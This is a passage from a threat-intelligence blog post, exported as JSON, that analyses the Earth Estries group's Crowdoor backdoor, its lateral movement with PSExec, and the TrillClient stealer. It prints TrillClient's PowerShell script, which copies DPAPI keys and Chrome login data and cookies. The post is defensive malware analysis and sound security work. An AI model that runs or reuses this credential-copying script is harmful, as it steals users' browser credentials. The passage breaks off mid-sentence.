{"id":57624,"date":"2024-11-08T00:00:00","date_gmt":"2024-11-08T00:00:00","guid":{"rendered":"urn:uuid:af1eafb5-cda0-7f9a-5e6d-f97a0ec28008"},"modified":"2024-11-08T00:00:00","modified_gmt":"2024-11-08T00:00:00","slug":"breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/","title":{"rendered":"Breaking Down Earth Estries’ Persistent TTPs in Prolonged Cyber Operations"},"content":{"rendered":"

<\/p>\n

<\/div>\n

Crowdoor will perform different actions based on the corresponding argument. In table 1, we summarize the behaviors exhibited by the new Crowdoor variant based on the arguments used. Overall, the behaviors are similar to the ones seen in the older variant, with the difference being the injected process (msiexec.exe<\/i>) and Command IDs (shown in table 2)<\/p>\n\n\n\n\n\n\n\n
Arguments<\/th>\nAction<\/th>\n<\/tr>\n
No argument<\/td>\nPersistence is set through the registry Run key or a service and the backdoor is restarted<\/td>\n<\/tr>\n
0<\/td>\nPersistence is set through the registry Run key or a service and the backdoor is restarted.<\/td>\n<\/tr>\n
1<\/td>\nThe backdoor is restarted by injecting to ‘msiexec.exe’<\/td>\n<\/tr>\n
2<\/td>\nThe backdoor main function is called<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

Table 1. List of arguments and their corresponding actions<\/sup><\/p>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
Old Crowdoor variant<\/th>\nNew Crowdoor variant<\/th>\nFunctions<\/th>\n<\/tr>\n
0x2347135<\/td>\n0x11736212<\/td>\nInitial connection C2<\/td>\n<\/tr>\n
0x2347136<\/td>\n0x11736213<\/td>\nCollect ComputerName,Username, OS version and hostnet or IP information<\/td>\n<\/tr>\n
0x2347137<\/td>\n0x11736214<\/td>\nRemote shell<\/td>\n<\/tr>\n
0x234713B<\/td>\n0x11736218<\/td>\nDelete malware files, persistence and exit<\/td>\n<\/tr>\n
0x2347140<\/td>\n0x1173621D<\/td>\nFile related Operation<\/td>\n<\/tr>\n
0x2347141<\/td>\n0x1173621E<\/td>\nOpen\/ReadFile<\/td>\n<\/tr>\n
0x2347142<\/td>\n0x1173621F<\/td>\nOpen\/WriteFile<\/td>\n<\/tr>\n
0x2347144<\/td>\n0x11736221<\/td>\nCollect drive information<\/td>\n<\/tr>\n
0x2347145<\/td>\n0x11736222<\/td>\nSearch File<\/td>\n<\/tr>\n
0x2347148<\/td>\n0x11736225<\/td>\nCreateDirectory<\/td>\n<\/tr>\n
0x2347149<\/td>\n0x11736226<\/td>\nRename file or directory<\/td>\n<\/tr>\n
0x234714A<\/td>\n0x11736227<\/td>\nDelete file or Directory<\/td>\n<\/tr>\n
0x234714A<\/td>\n0x11736228<\/td>\nCommunication with C&C server <\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

Table 2. Comparison between old and new Crowdoor variants<\/sup><\/p>\n\n\n\n\n\n\n\n\n
Package 1<\/th>\nPackage 2<\/th>\nPackage 3<\/th>\nPackage 4<\/th>\n<\/tr>\n
WinStore.exe (Host)<\/td>\nK7Sysmon.exe (Host)<\/td>\nHxTsk.exe (Host)<\/td>\nMsMsRng.exe (Host)<\/td>\n<\/tr>\n
Sqlite3.dll<\/td>\nK7Sysmn1.dll<\/td>\nd3d8.dll<\/td>\nsqlite3.dll<\/td>\n<\/tr>\n
datastate.dll<\/td>\nK7Sysmn2.dll<\/td>\nHxTsk (encrypted)<\/td>\nmsimg32.dll<\/td>\n<\/tr>\n
datast.dll<\/td>\nK7Sysmn3.dll<\/td>\n <\/td>\ndatastate.dll<\/td>\n<\/tr>\n
WinStore (encrypted)<\/td>\nK7Sysmon.dll (encrypted)<\/td>\n <\/td>\nMsMsRng (encrypted)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

Table 3. Crowdoor packages<\/sup><\/p>\n

Lateral Movement<\/span><\/h2>\n

Earth Estries uses PSExec to laterally install its backdoors and tools, notably by copying the CAB<\/i> files containing the backdoors or tools, and a batch file to perform the installation, maintain persistence, and execute the tools.<\/p>\n

Typically, PSExec is used to copy the CAB file containing the malware that will be laterally installed. However,in some instances, WMIC may be used in its place to achieve similar results. A set of batch files will then be copied and executed to perform the extraction, installation, and execution of the malware. Large scale collection may also be executed using batch files.<\/p>\n

In later stages of the attack, the backdoors may be used directly to perform lateral movement. CAB files are still used as containers for the tools to be installed, and batch files are still incorporated in the extraction, installation and execution of said tools. This will sometimes include the creation of persistence mechanisms for the batch file to act as an indirect persistence mechanism for the actual backdoors.<\/p>\n

Discovery, collection and exfiltration<\/span><\/h2>\n

TrillClient\u2019s user credential discovery<\/b><\/p>\n

Earth Estries will collect user credentials that can be used to further its objectives. The threat actor employs the TrillClient<\/a> information stealer for this routine, primarily collecting user credentials from browser user profiles. TrillClient launches a PowerShelll script that will collect user profiles to be saved at a specific location:<\/p>\n

foreach($win_user_path in $users_path){<\/span><\/p>\n

echo D | xcopy \\”C:\\Users\\$win_user_path\\AppData\\Roaming\\Microsoft\\Protect\\<\/b>” \\”$copy_dest_path\\$win_user_path\\Protect\\” \/E \/C \/H;<\/p>\n

attrib -a -s -r -h \\”$copy_dest_path\\$win_user_path\\*\\” \/S \/D;<\/p>\n

echo F | xcopy \\”C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\Local State\\<\/b>” \\”$copy_dest_path\\$win_user_path\\Local State\\” \/C;<\/p>\n

echo F | xcopy \\”C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies\\<\/b>” \\”$copy_dest_path\\$win_user_path\\Default\\Network\\Cookies\\” \/C<\/p>\n

echo F | xcopy \\”C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\\<\/b>” \\”$copy_dest_path\\$win_user_path\\Default\\Login Data\\” \/C;<\/p>\n

$profile_path = Get-ChildItem -Name \\”C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\\\\\<\/b>” -Include *Profile* -ErrorAction SilentlyContinue;<\/p>\n

foreach($chrome_user_path in $profile_path){<\/p>\n

echo F | xcopy \\”C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\$chrome_user_path\\Network\\Cookies\\<\/b>” \\”$copy_dest_path\\$win_user_path\\$chrome_user_path\\Network\\Cookies\\” \/C;<\/p>\n

echo F | xcopy \\“C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\$chrome_user_path\\Login Data\\<\/b>” \\”$copy_dest_path\\$win_user_path\\$chrome_user_path\\Login Data\\” \/C;

   }
}<\/b><\/p>\n

Data will be collected from the following folders:<\/p>\n